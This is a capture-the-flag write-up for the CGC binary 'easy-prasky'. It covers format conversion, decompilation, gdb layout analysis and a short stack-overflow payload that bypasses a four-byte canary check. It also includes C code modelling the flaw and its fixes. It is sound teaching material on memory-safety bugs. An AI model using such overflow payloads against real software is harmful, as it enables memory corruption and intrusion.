Information

Description

http://download.quals.shallweplayaga.me/335e35448b30ce7697fbb036cce45e34/easy-prasky.tar.bz2

easy-prasky_335e35448b30ce7697fbb036cce45e34.quals.shallweplayaga.me:10001


Writeup

File information

  • The file command gives the basic information shown below.

File information
$ tar -jxvf easy-prasky.tar.bz2
$ cd easy-prasky-with-buffalo-on-bing/
$ file easy-prasky-with-buffalo-on-bing 
easy-prasky-with-buffalo-on-bing: data
  • Inspect the head of the file to learn more about it.
  • The first bytes, 7f 43 47 43 ("\x7fCGC"), show that this is a CGC (Cyber Grand Challenge) executable rather than a standard ELF file.
hexdump -C easy-prasky-with-buffalo-on-bing | head
00000000  7f 43 47 43 01 01 01 43  01 4d 65 72 69 6e 6f 00  |.CGC...C.Merino.|
00000010  02 00 03 00 01 00 00 00  b7 86 04 08 34 00 00 00  |............4...|
00000020  80 08 00 00 00 00 00 00  34 00 20 00 03 00 28 00  |........4. ...(.|
00000030  05 00 04 00 06 00 00 00  34 00 00 00 34 80 04 08  |........4...4...|
00000040  34 80 04 08 60 00 00 00  60 00 00 00 04 00 00 00  |4...`...`.......|
00000050  04 00 00 00 01 00 00 00  00 00 00 00 00 80 04 08  |................|
00000060  00 80 04 08 3e 08 00 00  3e 08 00 00 05 00 00 00  |....>...>.......|
00000070  00 10 00 00 01 00 00 00  3e 08 00 00 00 00 00 00  |........>.......|
00000080  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000090  00 10 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|


Binary analysis

Preparing an environment to run CGC files

  • DARPA provides a Vagrant-based environment for running CGC binaries.
VMs
File               SHA-256
cgc-linux-dev.box  ae1e267b86ac556dac2ed7c6dfc6ffc9370a2134c1a53387c1809e09d21fa27e
vm.json            7f553ee1cf6d16dae7a23bf9738d678042b33a86caf1525a3e8aaf44d4cb12c5
Vagrantfile        ff0f8b4a3996a137d2a6eb7088a632928068425b9c4502f6c754c3f079672d00
  • Download the files from the site below and install them.
Vagrant command
$ vagrant up
Bringing machine 'cb' up with 'virtualbox' provider...
Bringing machine 'ids' up with 'virtualbox' provider...
Bringing machine 'pov' up with 'virtualbox' provider...
Bringing machine 'crs' up with 'virtualbox' provider...
Bringing machine 'ti' up with 'virtualbox' provider...
==> cb: Importing base box 'cgc-linux-dev'...
==> cb: Matching MAC address for NAT networking...
==> cb: Checking if box 'cgc-linux-dev' is up to date...
...
==> ti: stdin: is not a tty
==> ti: Running provisioner: file...
==> ti: Running provisioner: shell...
    ti: Running: inline script
==> ti: stdin: is not a tty
$
  • The VM can be accessed with the command below (password: vagrant).
SSH connection
$ ssh vagrant@127.0.0.1 -p 2222
vagrant@127.0.0.1's password: 
Linux cgc-linux-packer 3.13.11-ckt21-cgc #1 SMP Mon Feb 29 16:42:11 UTC 2016 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
vagrant@cb:~$ 
  • Copy the easy-prasky-with-buffalo-on-bing file to the CGC VM.
Send file to CGC VM.
$ scp -P 2222 easy-prasky-with-buffalo-on-bing vagrant@127.0.0.1:/home/vagrant
vagrant@127.0.0.1's password: 
easy-prasky-with-buffalo-on-bing    100% 2376     2.3KB/s   00:00
$ 
  • The copied file can now be executed, as shown below.
./easy-prasky-with-buffalo-on-bing
vagrant@cb:~$ ./easy-prasky-with-buffalo-on-bing 
test    
canary okvagrant@cb:~$ 

CGC to elf

  • IDA treats this file as plain data because, as explained earlier, it is in the CGC format.
  • The file has to be converted to a format IDA Pro understands before it can be analysed.
    • The cgc2elf tool provided by the Cyber Grand Challenge converts a CGC file into an ELF file.
cgc2elf install
$ sudo dpkg -i cgc2elf_10206-cfe-rc6_i386.deb 
Selecting previously unselected package cgc2elf.
(Reading database ... 209320 files and directories currently installed.)
Preparing to unpack cgc2elf_10206-cfe-rc6_i386.deb ...
Unpacking cgc2elf (10206-cfe-rc6) ...
Setting up cgc2elf (10206-cfe-rc6) ...
Processing triggers for man-db (2.6.7.1-1ubuntu1) ...
$
  • The conversion with cgc2elf is shown below. Afterwards, file identifies the binary as a 32-bit ELF executable, and checksec reports no stack canary, NX enabled and no PIE.
cgc2elf easy-prasky-with-buffalo-on-bing
$ file easy-prasky-with-buffalo-on-bing 
easy-prasky-with-buffalo-on-bing: data
$ cgc2elf easy-prasky-with-buffalo-on-bing 
$ file easy-prasky-with-buffalo-on-bing 
easy-prasky-with-buffalo-on-bing: ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), statically linked, stripped
$ checksec.sh --file easy-prasky-with-buffalo-on-bing_CGC 
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
No RELRO        No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   easy-prasky-with-buffalo-on-bing_CGC
$ 
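To make the relationship between the two formats concrete, here is an added C example (my own code, not from the writeup or from cgc2elf) that parses the 52 header bytes transcribed from the hexdump above and applies the CGC-to-ELF header rewrite; the rewrite is my approximation of what cgc2elf does (magic and OSABI bytes), and the transcribed header is the only input.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* 32-bit ELF header layout. The CGC executable format reuses it and differs only
   in e_ident: magic "\x7fCGC" instead of "\x7fELF" and OSABI byte 0x43 ('C'). */
typedef struct {
    unsigned char e_ident[16];
    uint16_t e_type, e_machine;
    uint32_t e_version, e_entry, e_phoff, e_shoff, e_flags;
    uint16_t e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx;
} ehdr32_t;

/* First 52 bytes of easy-prasky-with-buffalo-on-bing, transcribed from the
   hexdump in the writeup (only the header is reproduced here). */
static unsigned char cgc_header[52] = {
    0x7f,0x43,0x47,0x43,0x01,0x01,0x01,0x43,0x01,0x4d,0x65,0x72,0x69,0x6e,0x6f,0x00,
    0x02,0x00,0x03,0x00,0x01,0x00,0x00,0x00,0xb7,0x86,0x04,0x08,0x34,0x00,0x00,0x00,
    0x80,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x34,0x00,0x20,0x00,0x03,0x00,0x28,0x00,
    0x05,0x00,0x04,0x00
};
/* 1 if buf carries the CGC magic and 32-bit little-endian class/data bytes. */
int is_cgc(const unsigned char *buf, size_t len) {
    return len >= sizeof(ehdr32_t) && !memcmp(buf, "\x7f" "CGC", 4) && buf[4] == 1 && buf[5] == 1;
}

/* Copy the header fields out of the raw bytes (memcpy sidesteps alignment). */
int parse_header(const unsigned char *buf, size_t len, ehdr32_t *out) {
    if (len < sizeof *out) return -1;
    memcpy(out, buf, sizeof *out);
    return 0;
}

/* In-place CGC -> ELF header rewrite: magic becomes "\x7fELF" and EI_OSABI 0
   (System V), which is why `file` reports "(SYSV)" after conversion. Mirrors
   cgc2elf in outline only; it is my approximation, not the tool's code. */
int patch_cgc_to_elf(unsigned char *buf, size_t len) {
    if (!is_cgc(buf, len)) return -1;
    memcpy(buf + 1, "ELF", 3);
    buf[7] = 0;   /* EI_OSABI */
    buf[8] = 0;   /* EI_ABIVERSION */
    return 0;
}

int main(void) {
    ehdr32_t h;
    if (parse_header(cgc_header, sizeof cgc_header, &h) != 0) return 1;
    printf("entry=0x%08x phnum=%u shnum=%u\n", (unsigned)h.e_entry, (unsigned)h.e_phnum, (unsigned)h.e_shnum);
    return patch_cgc_to_elf(cgc_header, sizeof cgc_header);
}
```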

sub_8048370()

  • The function does the following.
    • It stores the string "lddwDrwhkTEBSya_" in Canary.
    • It stores the user's input in "userInputStr".
      • The input is read with scanf().
      • The input can overwrite the value saved in Canary.
    • It compares the first four bytes of Canary with "lddw" using strncmp().
      • It prints "canary ok" if the canary variable starts with "lddw".
      • It prints "hacking detected, see ya" if it does not.
sub_8048370()
int sub_8048370()
{
  char userInputStr; // [esp+2Fh] [ebp-29h]@1   input buffer, 0x29 - 0x15 = 0x14 = 20 bytes below Canary
  char Canary; // [esp+43h] [ebp-15h]@1

  strncpy(&Canary, "lddwDrwhkTEBSya_", 17);                  // 16 characters plus terminator
  scanf((int)&userInputStr);                                 // user input; can run past userInputStr into Canary
  if ( !strncmp((int)&Canary, (int)"lddwDrwhkTEBSya_", 4) )  // only the first 4 bytes ("lddw") are compared
  {
    printf((int)"hacking detected, see ya");
    exit(-1);
  }
  return printf((int)"canary ok");
}

Structure of the exploit

  1. The user input bypasses the canary check and causes a segmentation fault.

The following information is required for the attack:

  • The memory layout (the positions of "userInputStr" and "canary")

Information for the attack

Checking the memory layout

  • Set breakpoints as follows.
    • 0x804839d : strncpy()
    • 0x80483a8 : scanf()

Break point
(gdb) b *0x8048000 + 0x39d
Breakpoint 1 at 0x804839d
(gdb) b *0x8048000 + 0x3a8
Breakpoint 2 at 0x80483a8
  • The string "lddwDrwhkTEBSya_" is stored in the canary area (0xbffff6c3) by strncpy().
strncpy()
(gdb) r
Starting program: /home/lazenca0x0/Documents/DEFCON 2016/easy-prasky-with-buffalo-on-bing 

Breakpoint 1, 0x0804839d in ?? ()
(gdb) x/wx $esp
0xbffff680:	0xbffff6c3
(gdb) x/wx 0xbffff6c3
0xbffff6c3:	0x00000000
(gdb) c
Continuing.

Breakpoint 2, 0x080483a8 in ?? ()
(gdb) x/wx 0xbffff6c3
0xbffff6c3:	0x7764646c
(gdb) x/s 0xbffff6c3
0xbffff6c3:	"lddwDrwhkTEBSya_"
  • The address of userInputStr is 0xbffff6af and the address of canary is 0xbffff6c3.
    • 0xbffff6c3 - 0xbffff6af = 0x14 (20 bytes)
    • Input longer than 20 bytes therefore overwrites the canary area.
(gdb) x/wx $esp
0xbffff680:	0xbffff6af
(gdb) x/20wx 0xbffff6af
0xbffff6af:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffff6bf:	0x00000000	0x7764646c	0x68777244	0x4245546b
0xbffff6cf:	0x5f617953	0x00000000	0xfff6e800	0x048432bf
0xbffff6df:	0x00000008	0x00000000	0x00000000	0x0486c100
0xbffff6ef:	0x00000108	0xfff81a00	0x000000bf	0xfff86100
(gdb) 

Key information

  1. Address of the "userInputStr" variable: 0xbffff6af
  2. Address of the "canary" variable: 0xbffff6c3
  3. Offset between "userInputStr" and "canary": 20 bytes
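To show why the check in sub_8048370 is weak and what would fix it, here is an added C model of the function's frame (my own code, not from the binary or the writeup): the 20-byte gap between userInputStr and Canary comes from the stack offsets above, the unbounded read stands in for the binary's scanf, and the bounded read and the full 16-byte comparison are the hardened alternatives.

```c
#include <stdio.h>
#include <string.h>

/* Frame layout from the disassembly: userInputStr at ebp-0x29, Canary at
   ebp-0x15, so the canary begins 20 bytes after the input buffer. The frame
   is modelled as one flat byte array so the overwrite stays inside a single
   object and the demo itself remains memory-safe. */
#define CANARY_OFF 20
#define FRAME_SIZE 64
static const char CANARY[] = "lddwDrwhkTEBSya_";
typedef struct { char bytes[FRAME_SIZE]; } frame_t;

static void frame_init(frame_t *f) {
    memset(f, 0, sizeof *f);
    strncpy(f->bytes + CANARY_OFF, CANARY, 17);   /* as sub_8048370 does */
}

/* Read input into the buffer. bounded=0 stands in for the binary's scanf
   (limited only by the frame, to keep the demo safe, never by the 20-byte
   buffer); bounded=1 is the fix, e.g. scanf("%19s") or fgets() with a size. */
static void read_input(frame_t *f, const char *src, int bounded) {
    snprintf(f->bytes, bounded ? CANARY_OFF : FRAME_SIZE, "%s", src);
}

/* full=0 is the binary's check (first 4 bytes only); full=1 compares all
   16 bytes plus the terminator. */
static int canary_ok(const frame_t *f, int full) {
    return full ? memcmp(f->bytes + CANARY_OFF, CANARY, 17) == 0
                : strncmp(f->bytes + CANARY_OFF, CANARY, 4) == 0;
}

/* Feed input into a fresh frame; return 1 if the canary check passes. */
int run_check(const char *input, int bounded, int full) {
    frame_t f;
    frame_init(&f);
    read_input(&f, input, bounded);
    return canary_ok(&f, full);
}

int main(void) {
    /* Constructed input shaped like the writeup's: 20 filler bytes, "lddw",
       then more filler that runs on past the canary. */
    const char *in = "AAAAAAAAAAAAAAAAAAAAlddwAAAAAAAAAAAAAAAAAAA";
    printf("weak check, unbounded read: %d (bypassed)\n", run_check(in, 0, 0));
    printf("full check, unbounded read: %d (caught)\n", run_check(in, 0, 1));
    printf("weak check, bounded read:   %d (canary intact)\n", run_check(in, 1, 0));
    return 0;
}
```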

Exploit Code

Exploit code
vagrant@cb:~$ ./easy-prasky-with-buffalo-on-bing_CGC 
AAAAAAAAAAAAAAAAAAAAlddwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
canary okSegmentation fault (core dumped)
vagrant@cb:~$

Flag
